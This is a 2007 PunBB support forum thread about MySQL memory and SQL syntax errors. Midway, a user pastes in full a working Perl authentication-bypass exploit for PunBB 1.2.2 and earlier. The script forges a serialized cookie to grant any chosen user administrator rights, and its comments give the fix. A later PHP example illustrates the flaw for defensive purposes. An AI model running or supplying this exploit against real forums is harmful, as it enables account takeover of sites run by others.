1 (edited by h0ly lag 2007-04-20 01:01)

Topic: Unable to fetch category/forum list

I enabled debug mode and got this:

File: /home/uhmodsco/public_html/forums/admin_forums.php
Line: 460

PunBB reported: Unable to fetch category/forum list

Database reported: Got error 12 from table handler (Errno: 1030)

These are lines 455 through 470 in my admin_forums.php file.

<?php

$tabindex_count = 4;

// Display all the categories and forums
$result = $db->query('SELECT c.id AS cid, c.cat_name, f.id AS fid, f.forum_name, f.disp_position FROM '.$db->prefix.'categories AS c INNER JOIN '.$db->prefix.'forums AS f ON c.id=f.cat_id ORDER BY c.disp_position, c.id, f.disp_position') or error('Unable to fetch category/forum list', __FILE__, __LINE__, $db->error());

$cur_category = 0;
while ($cur_forum = $db->fetch_assoc($result))
{
    if ($cur_forum['cid'] != $cur_category)    // A new category since last iteration?
    {
        if ($cur_category != 0)
            echo "\t\t\t\t\t\t\t".'</table>'."\n\t\t\t\t\t\t".'</div>'."\n\t\t\t\t\t".'</fieldset>'."\n\t\t\t\t".'</div>'."\n";

?>

Any help guys?

Re: Unable to fetch category/forum list

Error code 12: Cannot allocate memory

Talk to your host

3 (edited by h0ly lag 2007-04-20 01:28)

Re: Unable to fetch category/forum list

Ok, thank you. Without doing anything at all the problem has disappeared. Could this have been a temp. problem with my MySQL database?

Oh, and I just wanted to say I love PunBB.

Re: Unable to fetch category/forum list

Yup, it was most likely a temporary MySQL issue :)

5 (edited by h0ly lag 2007-04-20 01:39)

Re: Unable to fetch category/forum list

Ok now some guy blows in and registers and posts this.

#!/usr/bin/perl
use IO::Socket;

#
#   PunBB version <= 1.2.2 auth bypass exploit
#
# -------------------------------------------------
# About vuln:
# lets look file /include/functions.php
# ### code start ###
# function check_cookie(&$pun_user)
# {
# ...
# if (isset($_COOKIE[$cookie_name]))
# list($cookie['user_id'], $cookie['password_hash']) = @unserialize($_COOKIE[$cookie_name]);
#
# if ($cookie['user_id'] > 1)
# {
# // Check if there's a user with the user ID and password hash from the cookie
# $result = $db->query('SELECT .... tra-la-la... );
# $pun_user = $db->fetch_assoc($result);
#
# // If user authorisation failed
# if (!isset($pun_user['id']) || md5($cookie_seed.$pun_user['password']) != $cookie['password_hash'])
# ...                                                                    ^^^ HERE !!!
# ### code end ###
# and we can logging with any user id if we use boolean value in cookie password_hash
# evil cookie is : a:2:{i:0;s:1:"2";i:1;b:1;} where 2 is user id
#
# fix:
# if (!isset($pun_user['id']) || md5($cookie_seed.$pun_user['password']) != $cookie['password_hash'])
# change to
# if (!isset($pun_user['id']) || md5($cookie_seed.$pun_user['password']) !== $cookie['password_hash'])
# -------------------------------------------------
# (c)oded by 1dt.w0lf // 09.03.2005 // r57 // www.rst.void.ru
# -------------------------------------------------
# example:
# r57punbb.pl nerf.ru /forum/ 2 47
# + Exploit success!
# + Group membership saved!
# + Now user with id=47 have admin level!
# ja-ja-ja dast ist fantastish smile
# ------------------------------------------------

$server    = $ARGV[0];
$folder    = $ARGV[1];
$admin_uid = $ARGV[2];
$user_uid  = $ARGV[3];
$suc = 0;
if (@ARGV < 4 || $admin_uid =~ /[^\d]/ || $user_uid =~ /[^\d]/)
{
print q{
       PunBB version <= 1.2.2 auth bypass exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
usage: r57punbb.pl [host] [/folder/] [admin_id] [user_id]

[host]     - hostname where punbb installed
[/folder/] - folder where punbb installed
[admin_id] - id of user who have admin rights
[user_id]  - user with this id get admin level after
              success exploiting
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
r57 private code // rst.void.ru
};
exit();
}
$server =~ s/^((?:http:\/\/)*)([^\/]*)(\/*)$/$2/;
$str    = 'Group membership saved';
$cook   = 'a:2:{i:0;s:'.length($admin_uid).':"'.$admin_uid.'";i:1;b:1;}';
$data   = 'form_sent=1&group_id=1&update_group_membership=Save';
$cook   =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "$socket error $!";
print $socket "POST ${folder}profile.php?section=admin&id=$user_uid&action=foo HTTP/1.0\n";
print $socket "Host: $server\n";
print $socket "Referer: http://$server${folder}profile.php?section=admin&id=$user_uid\n";
print $socket "Cookie: punbb_cookie=$cook\n";
print $socket "Content-Type: application/x-www-form-urlencoded\n";
print $socket "Content-Length: ".length($data)."\n\n";
print $socket "$data\n\n";
while(<$socket>){ if(/$str/) { $suc = 1; last; } }
($suc)?(print "+ Exploit success!\n+ $str!\n+ Now user with id=$user_uid have admin level!\n")
      :(print "- Exploit failed\n")

you gotta secure this site.

WTF!!! He can get admin status
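The type confusion described in the script's comments, and the `!==` fix it names, shown side by side as an added PHP example (not part of the original post and not PunBB source). The function names, seed, stored hash and sample cookies are constructed for illustration; `check_hardened` goes beyond the fix on the page by validating the cookie's types before comparing.

```php
<?php
// Added example, not PunBB source. Seed, stored hash and cookies are constructed.
$cookie_seed = 'constructed-seed';
$stored_hash = sha1('constructed-password');   // stands in for the stored password hash

// The comparison quoted from PunBB 1.2.2: != converts operand types first,
// so a non-empty string compared with boolean true is considered equal.
function check_loose($expected, $supplied)
{
    return !($expected != $supplied);
}

// The fix given on the page: !== compares type and value.
function check_strict($expected, $supplied)
{
    return !($expected !== $supplied);
}

// Stricter variant (assumption, not PunBB code): validate the cookie's shape
// and types before any comparison, then compare in constant time.
function check_hardened($expected, $raw_cookie)
{
    $c = @unserialize($raw_cookie, ['allowed_classes' => false]);
    if (!is_array($c) || count($c) !== 2 || !isset($c[0], $c[1]))
        return false;
    if (!is_string($c[0]) || !ctype_digit($c[0]) || !is_string($c[1]))
        return false;
    return hash_equals($expected, $c[1]);
}

$expected = md5($cookie_seed.$stored_hash);
$cookies = [
    'legitimate'   => serialize(['2', $expected]),
    'wrong hash'   => serialize(['2', str_repeat('f', 32)]),
    'boolean hash' => 'a:2:{i:0;s:1:"2";i:1;b:1;}',   // cookie shape described above
];

// Print how each check treats each cookie.
foreach ($cookies as $label => $raw) {
    list($uid, $hash) = unserialize($raw, ['allowed_classes' => false]);
    printf("%-13s loose=%s strict=%s hardened=%s\n", $label,
        var_export(check_loose($expected, $hash), true),
        var_export(check_strict($expected, $hash), true),
        var_export(check_hardened($expected, $raw), true));
}
```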

Re: Unable to fetch category/forum list

You're running 1.2.2? That's over 2 years old...

Re: Unable to fetch category/forum list

Oh... I'm an idiot. I'm on 1.2.15.

Re: Unable to fetch category/forum list

h0ly lag wrote:

Oh... I'm an idiot. I'm on 1.2.15.

...which has no "live" exploits at this point in time.
Just in case anyone is confused ;)

Re: Unable to fetch category/forum list

Grrr, another problem.

Guests and regular users get this error:

File: /home/uhmodsco/public_html/forums/viewtopic.php
Line: 124

PunBB reported: Unable to fetch topic info

Database reported: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '0forums AS pf ON f.parent_forum_id=pf.id WHERE (fp.read_forum I (Errno: 1064)

Is this something I should take up with my host?

Re: Unable to fetch category/forum list

Sounds like you modified the file incorrectly ;)

Re: Unable to fetch category/forum list

Yep, I uploaded a fresh copy from the 1.2.15 zip file and everything works now. I feel like an idiot, I seem to have messed up quite a few things today. Thank you for your help. One LAST question: what's with your version numbers, are you counting down or something? Because you said 1.2.2 was 2 years old and the newest version is 1.2.15.

Re: Unable to fetch category/forum list

h0ly lag wrote:

Yep, I uploaded a fresh copy from the 1.2.15 zip file and everything works now. I feel like an idiot, I seem to have messed up quite a few things today. Thank you for your help. One LAST question: what's with your version numbers, are you counting down or something? Because you said 1.2.2 was 2 years old and the newest version is 1.2.15.

This isn't like decimals with numbers; each individual part is its own number.
So there have been 16 revisions of the 1.2 branch of PunBB: 1.2.0, 1.2.1, 1.2.2, 1.2.3, 1.2.4, 1.2.5, 1.2.6, 1.2.7, 1.2.8, 1.2.9, 1.2.10, 1.2.11, 1.2.12, 1.2.13, 1.2.14, 1.2.15

Re: Unable to fetch category/forum list

Sigh...

File: /home/uhmodsco/public_html/forums/include/search_idx.php
Line: 183

PunBB reported: Unable to insert search index word matches

Database reported: Out of memory (Needed 81892 bytes) (Errno: 5)


Something must be going terribly wrong with my host's MySQL.

Re: Unable to fetch category/forum list

Same kind of error as the first one: talk to your host ;)